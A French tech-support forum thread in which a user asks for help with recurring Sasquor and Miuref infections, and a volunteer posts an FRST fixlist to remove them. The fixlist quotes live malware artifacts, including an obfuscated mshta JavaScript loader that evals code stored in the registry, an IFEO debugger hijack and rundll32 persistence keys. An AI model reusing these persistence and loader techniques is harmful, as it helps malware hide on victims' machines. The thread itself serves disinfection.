Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1328 connectés 

  FORUM HardWare.fr
  Windows & Software
  Virus/Spywares

  Windows defender sasquor et autres

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Windows defender sasquor et autres

n°3256879
geep13100
Posté le 01-12-2016 à 12:46:51  profilanswer
 

Bonjour,
 
Windows defender me signale régulièrement sasquor, miuref et autres.
Malgré plusieurs nettoyages avec defender, mbam, malware hunter, adwcleaner, outil de suppression des logiciels malveillants, KVRT cela revient sans arrêt...
Je pense que l'intrus qui m'empoisonne s'est glissé dans mon pc lors de mes récents essais de divers "outils" pour pdf.
 
J'ai bien lu le sujet qui m'a amené jusqu'ici voici donc mes résultats de FRST:
 
http://www.cjoint.com/c/FLblwQg3eCf
 
http://www.cjoint.com/c/FLblusMGIaf
 
Merci pour votre aide !


---------------
Geep13100
mood
Publicité
Posté le 01-12-2016 à 12:46:51  profilanswer
 

n°3256895
monk521
Posté le 01-12-2016 à 13:40:16  profilanswer
 

Bonjour,
 
Analyse en cours des rapports...

n°3256903
monk521
Posté le 01-12-2016 à 14:59:08  profilanswer
 

Merci d'appliquer ce qui suit.
 
 
 
 
==> FRST Correction :
 
 

  • Appuyer sur les touches du clavier Windows et r.
  • Dans la fenêtre, écrire: notepad (voir image ci-dessous).
  • Cliquer sur OK.


       http://nsa38.casimages.com/img/2015/08/27/150827070811374213.png
 
 

  • Le bloc-notes s'ouvre.  


 

  • Copier maintenant toutes les lignes en gras ci-dessous:


    Note: pour copier toutes les lignes, griser de haut en bas toutes les lignes en restant appuyer sur le  
            clic gauche de la souris. Puis faire un clic droit de la souris et choisir
Copier.
 
 

CloseProcesses:
CreateRestorePoint:
Task: {16779FA5-1059-4DFB-BAC3-E1CB27E7BD11} - System32\Tasks\Gretertychlerent Center => C:\Program Files (x86)\Ckusitrafety\necity.exe
file: C:\Program Files (x86)\Ckusitrafety\necity.exe  
C:\Program Files (x86)\Ckusitrafety
Task: {52C740F1-4AF1-42F2-AC6B-4FE1FF0B07FD} - System32\Tasks\{21A5DB5D-964B-463B-815F-8C0B46F5CCA0} => pcalua.exe -a "E:\Torrents\112db Plugins Pack 2015 + Morgana REPACK-R2R (Win)\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.REPACK-R2R\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.REPACK-R2R\Morgana-1.2.7.exe" -d "E:\Torrents\112db Plugins Pack 2015 + Morgana REPACK-R2R (Win)\112db.Morgana.v1.2.7.WIN.OSX.Incl.Keygen.RE (l'élément de données a 61 caractères en plus).
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\26348685.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\26348685.sys => ""="Driver"
HKU\.DEFAULT\Software\Classes\4b20775: "C:\WINDOWS\system32\mshta.exe" "javascript:MOSnwEM7="GwM2R";u2f=new ActiveXObject("WScript.Shell" );r0lQju2="1";W7AFx7=u2f.RegRead("HKCU\\software\\vqwzdwqdv\\jkjkrrefj" );zodV9ygj="bq2Cwjz";eval(W7AFx7);cYa0AHE5F="nE";"  
HKU\S-1-5-18\...\Run: [teklon] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklon.dll",teklon <===== ATTENTION
file: C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklon.dll
HKU\S-1-5-18\...\Run: [teklum] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\teklum.dll",teklum <===== ATTENTION
HKU\S-1-5-18\...\Run: [dfrang] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\dfrang.dll",dfrang <===== ATTENTION
HKU\S-1-5-18\...\Run: [onikfl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\onikfl.dll",onikfl <===== ATTENTION
HKU\S-1-5-18\...\Run: [buuigl] => rundll32.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Local\buuigl.dll",buuigl <===== ATTENTION
IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Ckusitrafety\_ALLOWDEL_a25403d\Gubed.exe -Yrrehs
file: C:\Program Files (x86)\Ckusitrafety\_ALLOWDEL_a25403d\Gubed.exe
FF SearchPlugin: C:\Users\Gerald\AppData\Roaming\Firefox\Firefox\Profiles\ggpupmwm.default\searchplugins\searchinme.xml
R2 WinSAPSvc; C:\ProgramData\WinSAPSvc\WinSAP.dll
2016-11-28 13:57 - 2016-11-28 13:57 - 00000000 ____D C:\ProgramData\WinSAPSvc
2016-11-28 13:56 - 2016-11-28 13:56 - 00000000 ____D C:\Program Files (x86)\2obfd6a7
2016-11-22 19:45 - 2016-11-22 19:45 - 00000000 ____D C:\Program Files\kdoag
2016-11-21 03:55 - 2016-11-26 12:43 - 00000000 ____D C:\Program Files (x86)\Wepkthogetain
2016-11-18 13:56 - 2016-08-18 15:36 - 00000000 ____D C:\temp
file: C:\WINDOWS\system32\drivers\azmixfwr.sys
 

 
 

  • Retourner dans le bloc-notes ouvert et au milieu de la page, faire un clic de la souris et choisir Coller (toutes les lignes vont s'inscrire).  


  • Dans l'entête du bloc-notes, cliquer sur Fichier, puis Enregistrer sous ... et selectionner Bureau.  

        Dans la case Nom du fichier, écrire fixlist et cliquer sur Enregistrer.  
 
 

  • Puis, à partir du Bureau, faire un clic droit de la souris sur l'icône de FRST ou FRST64 et choisir "Exécuter en tant qu'administrateur".


  • Cliquer sur Corriger


     Note : Patienter le temps de la suppression. Le PC va redémarrer.
 
 
    http://nsa37.casimages.com/img/2015/08/27/150827070424411616.png
 
 

  • Une fois le PC redémarré, un rapport Fixlog.txt a été créé sur le Bureau.


  • Héberger ce rapport sur www.Cjoint.com, puis copier/coller le lien fourni dans ta prochaine réponse sur le forum.


Message édité par monk521 le 01-12-2016 à 15:30:50
n°3256905
geep13100
Posté le 01-12-2016 à 15:29:38  profilanswer
 

Bonjour again,
 
quelle rapidité !voici le fixlog http://www.cjoint.com/c/FLboCIcRKkf

n°3256906
monk521
Posté le 01-12-2016 à 15:38:50  profilanswer
 

OK, on fait le point : comment se comporte le PC ?

n°3256948
geep13100
Posté le 01-12-2016 à 23:06:39  profilanswer
 

Toujours des indésirables, lorsque je lance firefox, j'ai 2 fenêtres qui s'ouvrent, quand je lance un programme, le pc mouline, je dois passer par la touche windows pour avoir la boite de dialogue "voulez vous autoriser..."qui s'affiche. J'avais fait un test de detection avec mes divers outils, sans apporter de correction entre les détections ça m'a donné des trucs différents pour chacun : http://www.cjoint.com/c/FLbwf5K1jKf

n°3256959
monk521
Posté le 02-12-2016 à 07:29:19  profilanswer
 

Appliquer alors les corrections avec vos outils.


Aller à :
Ajouter une réponse
  FORUM HardWare.fr
  Windows & Software
  Virus/Spywares

  Windows defender sasquor et autres

 

Sujets relatifs
Windows 7 tres lent a charger /impossible a charger 1x sur 10.Installation Windows 7 ou 10 sur PC MSI GE72VR 6RF-068XFR
Changer de disque principal sur windows 10 (hhd ==> ssd)Erreur Windows => aucune solutions ?
Suprimer la demande d'autorisation d'administrateur sur windows 10Activation Windows 10 erreur 0x8007232b ou 0x8007007B
Windows qui s'éteint mais pas la touraffichage windows vieux de 500 ans
Migration Windows 7/10 -> Partition 1To transformée en RAWLogiciel pour l'optimisation de Windows
Plus de sujets relatifs à : Windows defender sasquor et autres


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR